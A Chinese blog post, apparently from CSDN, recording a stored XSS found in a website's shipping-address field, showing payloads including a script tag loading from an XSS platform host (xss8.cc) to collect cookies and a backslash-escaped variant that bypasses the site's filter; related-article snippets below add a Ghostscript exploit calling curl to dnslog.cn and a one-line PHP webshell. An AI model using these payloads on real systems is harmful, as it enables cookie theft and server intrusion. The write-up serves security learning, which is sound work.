【渗透实例】记录一次XSS渗透过程

最新推荐文章于 2024-07-22 12:01:57 发布
最新推荐文章于 2024-07-22 12:01:57 发布
阅读量2.3k 收藏 7
点赞数 2
分类专栏: 渗透实例 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37683287/article/details/94591810
版权
本文记录了一次XSS渗透过程,首先在目标网站的编辑收货地址处发现XSS漏洞,然后通过构造带转义字符的XSS代码成功绕过平台过滤,实现了与XSS平台的连接。虽然能获取用户Cookie等信息,但由于触发条件限制,实际利用价值有限。作者探讨了漏洞可能的其他利用价值,并欢迎读者分享想法。
摘要由CSDN通过智能技术生成

0x01 找到存在XSS的位置

没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。

使用的XSS代码:<img src=1 onerror=alert(1)
#因为CSDN编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。

在这里插入图片描述

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

在这里插入图片描述
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字

最低0.47元/天 解锁文章
TeamsSix
关注
专栏目录
对某小程序的一次渗透记录
布啦啦
03-25 666
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
渗透测试实例指南--XSS
qq_37051023的博客
07-30 222
概要:XSS--跨站脚本攻击,Cross-Site Scripting,属于代码注入攻击的一种,针对网站应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入到网页,其他用户浏览器此页面时会受到影响,一旦攻击成功,则可能获取较高权限、私密网页内容、会话和cookie等内容。 XSS攻击分为三种方式:反射型XSS、存储型XSS、DOM型XSS。 反射型:攻击者利用电子邮件或其他方式将包含XSS代码的恶意链接发送给目标用户,目标用户点击或浏览此链接后,会访问到某服务器,服务器接收到请求后,将带有XSS代码的数
一次渗透测试实战记录
最新发布
Locosomnus的博客
07-22 684
记录一下,只是记录一下
XSS例子
技术资料库
10-19 6187
Note from the author: XSS is Cross Site Scripting. If you dont know how XSS (Cross Site Scripting) works, this page probably wont help you. This page is for people who
记录一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 428
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
记录一次模拟渗透
0verWatch的博客
07-25 583
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
渗透测试XSS实验集合
WEL测试
12-22 938
MCIR-XSSMH:challenge0 页面:/mcir/xssmh/challenges/challenge0.php 1、验证是否存在XSS注入:<script>alert(1)</script> 2、存在XSS注入,要求是弹出“Hello World”,调整注入内容:<script>alert("Hello, world!")</script>url如下: http://mcir.pte.com/mcir/xssmh/xss.php?locati
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3999
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
XSS漏洞——渗透day08
qq_62716256的博客
09-04 584
XSS漏洞——渗透day08
第04篇:XSS三重URL编码绕过实例1
08-03
这表明服务器端可能在接收参数后,不仅解码了一次URL,还将其直接输出到HTML中。 攻击者抓住了这个逻辑错误,通过进行三重URL编码(%252522),成功绕过了服务器的防御,使得双引号被正确解析并闭合了HTML标签,...
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
XSS漏洞解决方案实例
08-30
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
记录一次渗透测试过程
weixin_30730151的博客
12-18 609
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
【萌新】记录一次渗透小站的过程
Leep0rt的博客
09-07 1003
一开始接触该站 先随便翻阅了一些目录 发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目 于是 二话不说 看看有没有注入点 输入一个  '  看一看  发现报错了!!! 然后惯例 and 1=1, and 1=11 发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧! 云锁s
记录一次渗透的思路
派大李的博客
11-26 303
信息收集就略过了。。。 尝试弱口令成功进入后台。。 弱口令简直就是 0day啊!!! 后台界面。。 进到后台就要getshell,找到上传点,burp改包成功上传冰蝎 拼接url地址访问 成功连接,环境是phpstudy搭建的,windows2012的服务器 系统函数都被禁用,执行不了命令,突破: phpstudy搭建的环境权限都很大,可以跨目录,直接修改php.ini配置文件 成功执行命令:whoami 是个管理员权限,接下来就是重头戏了,本人在这里翻车了。。。 提权试了许多方法,奈何我太
记录一次web渗透测试
m0_47421272的博客
01-07 2937
** 刚学web渗透2个月 第一次实战。 ** 渗透利用的工具: 1.dirb 2.nmap 开始 朋友发给我一个链接,点进去看是一个后台 尝试弱口令登录.(user:admin pass:admin) 非常幸运,登录进了后台。 找上传点上传webshell。 这里上传没有格式限制。 上传webshell。可以上传成功。 右键复制链接地址。 使用weevely连接。 发现后缀没显示,应该过滤掉了,本人比较懒,webshell上传失败了。 那就使用dirb扫描该站点目录,看看有没有敏感目录。
一次xss挑战
weixin_33862514的博客
01-22 128
2019独角兽企业重金招聘Python工程师标准>>> ...
一次XSS攻击绕过
zkaqlaoniao的博客
10-27 524
最近一直在看国外的赏金平台,绕waf是真的难受, 记录一下绕过的场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值